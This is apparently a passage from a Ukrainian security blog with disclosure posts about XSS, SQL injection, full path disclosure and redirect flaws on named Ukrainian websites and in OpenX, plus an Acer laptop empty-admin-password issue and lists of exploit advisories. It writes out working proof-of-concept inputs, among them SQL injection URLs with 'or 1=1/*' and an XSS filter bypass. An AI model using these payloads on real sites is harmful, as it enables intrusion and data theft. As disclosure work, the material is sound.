Websecurity - Веб безпека

У квітні, 28.04.2009, я виявив Insufficient Authentication уразливість в ноутбуках Acer. На даних ноутбуках (на двох моїх) використовується Windows XP Home Rus, у випадку інших ОС уразливість також може бути присутня.

В Windows XP Home в дефолтному акаунті адміністратора “Администратор” пустий пароль. І він не задається рівним паролю першого адміна, коли при першому запуску ноутбука створюється акаунт адміна (як це робиться при інсталяції Windows XP). Тому при фізичному доступі до ноутбука, будь-хто зможе зайти в систему з правами адміністратора.

Дані ноутбуки в мене вже давно (ними користується моя мати, я сам ними майже не користуются, лише адмініструю): 2313LC модель з серпня 2005, а 2413LC модель з квітня 2006. І встановивши паролі на свій адмінський акаунт при першому запуску Віндовса, я гадав, що з паролями в системі все гаразд. Поки нещодавно, 28.04.2009, під час адміністрування не виявив, що у дефолтного акаунта адміна не заданий пароль.

Стосовно питань веб безпеки, то дана уразливість в ноутбуках Acer може призвести до того, що логіни і паролі до ваших сайтів (а також кукіси для авторизації), що були збережені в браузері, можуть бути викрадені. Це також стосується вашої електронної пошти, якщо на ноутбуці ви використовуєте поштовий клієнт (Outlook Express чи інший).

Уразливі моделі ноутбуків: Acer TravelMate 2313LC, Acer TravelMate 2413LC та потенційно інші моделі.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Simple:Press Forum і fMoblog. Для котрих з’явилися експлоіти. Simple:Press Forum - це плагін форуму, fMoblog - це moblog плагін, що дозволяє публікувати зображення та описи з мобільного телефону. А також надаю детальну інформацію про Cookie Integrity Protection Vulnerability в Wordpress 2.5, про яку я писав раніше.

• WordPress SQL Injection (wp-content-simple-forum) (деталі)
• Wordpress Plugin fMoblog 2.1 (id) SQL Injection Vulnerability (деталі)
• Wordpress 2.5 Cookie Integrity Protection Vulnerability (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• iDefense Security Advisory 02.04.08: Hewlett-Packard Network Node Manager Topology Manager Service DoS Vulnerability (деталі)
• HP OpenView Network Node Manager (OV NNM) Remote Denial of Service (DoS) (деталі)
• NetClassifieds Sql Injection (деталі)
• Horde Webmail XSS (деталі)
• New roundup packages fix cross-site scripting vulnerability (деталі)
• Safari 3.1.1 Multiple Vulnerabilities for windows (деталі)
• Coppermine <=1.4.17 SQL-inj Session Hijack Exploit (деталі)
• Coppermine <=1.4.16 [Content-type] SQL-injection Exploit (деталі)
• New phpmyadmin packages fix several vulnerabilities (деталі)
• GroupWise 7 attached bugs (деталі)

06.01.2009

У лютому, 25.02.2008, я знайшов Cross-Site Scripting та Information Leakage уразливості на проекті http://ubr.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

07.05.2009

XSS:

• alert(document.cookie)
• alert(document.cookie)

Information Leakage:

http://ubr.ua/news/xml/rss200/smphr/1/

Дані уразливості вже виправлені.

Але дірки в старому локальному пошуковці виправлені за рахунок його заміни на новий. В якому також є XSS уразливість.

XSS:

• alert(document.cookie)
• цікавий
• html включення

В даній добірці уразливості в веб додатках:

• Super News v1.0 Remote SQL Injection Vulnerability (деталі)
• SOPHOS Email Security Appliance Cross Site Scripting Vulnerability (деталі)
• Lyris ListManager - Multiple Vulnerabilities (деталі)
• RedDot CMS SQL injection vulnerability (деталі)
• Acidcat CMS Multiple Vulnerabilities (деталі)
• Deciphering the PHP-Nuke Captcha (деталі)
• Deciphering the Simple Machines Forum audio Captcha (деталі)
• Cross site scripting issues in s9y (CVE-2008-1386, CVE-2008-1387) (деталі)
• Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it (деталі)
• Powered by gCards v1.46 SQL (деталі)

У серпні, 11.08.2008, я знайшов нові уразливості на проекті http://www.rozetka.com.ua (онлайн магазин). Це Cross-Site Scripting та Insufficient Anti-automation уразливості. Про що найближчим часом сповіщу адміністрацію проекту.

Стосовно уразливостей на сайтах онлайн магазинів останній раз я писав про уразливості на tvshop.com.ua. Також раніше я вже писав про уразливості на www.rozetka.com.ua.

XSS:

• alert(document.cookie)
• цікавий
• html включення

Insufficient Anti-automation:

http://www.rozetka.com.ua/register.php
http://www.rozetka.com.ua/ru/contacts/index.html

На сторінці реєстрації та сторінці контактів немає захисту від автоматизованих запитів (капчі).

Дані уразливості досі не виправлені.

11.09.2007

У січні, 09.01.2007 (а також додатково сьогодні), я знайшов Cross-Site Scripting, SQL DB Structure Extraction, Full path disclosure, SQL Injection та DoS уразливості на проекті http://www.pk.kiev.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

05.05.2009

Зараз сайт http://www.pk.kiev.ua змінив домен на http://mycityua.com.

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)

SQL DB Structure Extraction:

http://www.pk.kiev.ua/search/?search=-

http://www.pk.kiev.ua/search/?search=1&section%5B10%5D=10-

http://www.pk.kiev.ua/search/?search=1&ordnung=date-

Full path disclosure:

http://www.pk.kiev.ua/search/?search=1&section%5B10%5D=10-

SQL Injection:

http://www.pk.kiev.ua/search/?search=news&section%5B10%5D=1000%20or%201=1/*

DoS (через SQL Injection):

http://www.pk.kiev.ua/search/?search=1&section%5B10%5D=1%20or%20chapter!=1000/*

Дані уразливості вже виправлені. Але як щойно глянув, в пошуці на оновленому сайті також є уразливості (Cross-Site Scripting, SQL DB Structure Extraction та SQL Injection), про що я з часом напишу.

У березні, 12.03.2009, я знайшов Full path disclosure, Cross-Site Scripting та Redirector уразливості в OpenX (Redirector уразливість в цій банерній системі я зустрічав на сайтах ще в 2007 році). Це популярна локальна банерна система, що раніше називалася Openads. Уразливості виявив в OpenX v2.4.7 та перевірив їх в інших версіях системи.

Full path disclosure:

http://site/openx/www/delivery/fc.php?MAX_type=1

XSS:

http://site/openx/www/delivery/fc.php?MAX_type=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (обхід XSS фільтрів у версії 2.6.3):

http://site/openx/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Redirector:

http://site/openx/www/delivery/ck.php?dest=http://site.com

Про редиректор в Openads / OpenX я вже писав.

Уразливі OpenX v2.4.9, OpenX v2.6.3 та попередні версії (та всі версії Openads). А до Redirector уразливі всі версії системи - OpenX v2.8.0 та попередні версії.

В даній добірці уразливості в веб додатках:

• Fones Clinic Mart SQL (деталі)
• Format string in The Dawn of Time 1.69s beta4 (деталі)
• HP Storage Essentials SRM, Remote Unauthorized Access (деталі)
• Carbon Communities forum Multiple Vulnerabilities. (деталі)
• Istant-Replay Forum Remote File Inclusion Vulnerability (деталі)
• Koobi Pro 6.25 poll Remote SQL Injection Vulnerability (деталі)
• Koobi CMS 4.2.4/4.2.5/4.3.0 Multiple Remote SQL Injection Vulnerabilities (деталі)
• Classifieds Caffe (index.php cat_id) Remote SQL Injection (деталі)
• LightNEasy v.1.2.2 flat Multiple Vulnerabilities (деталі)
• 5th avenue Shopping Cart SQL Injection (деталі)

15.12.2008

У лютому, 16.02.2008, я знайшов Cross-Site Scripting уразливість на проекті http://holms.adamant.ua - пошуковій системі Холмс. Про що найближчим часом сповіщу адміністрацію проекту.

Стосовно проектів компанії Адамант раніше я писав про уразливість на adamant.ua.

Детальна інформація про уразливість з’явиться пізніше.

01.05.2009

XSS:

• alert(document.cookie) (виправлена)
• html включення (PR6)

Дану уразливість вже виправели (тільки XSS, але не HTML Injection), але неякісно. І даний фільтр легко обходиться.

XSS:

• alert(document.cookie)
• цікавий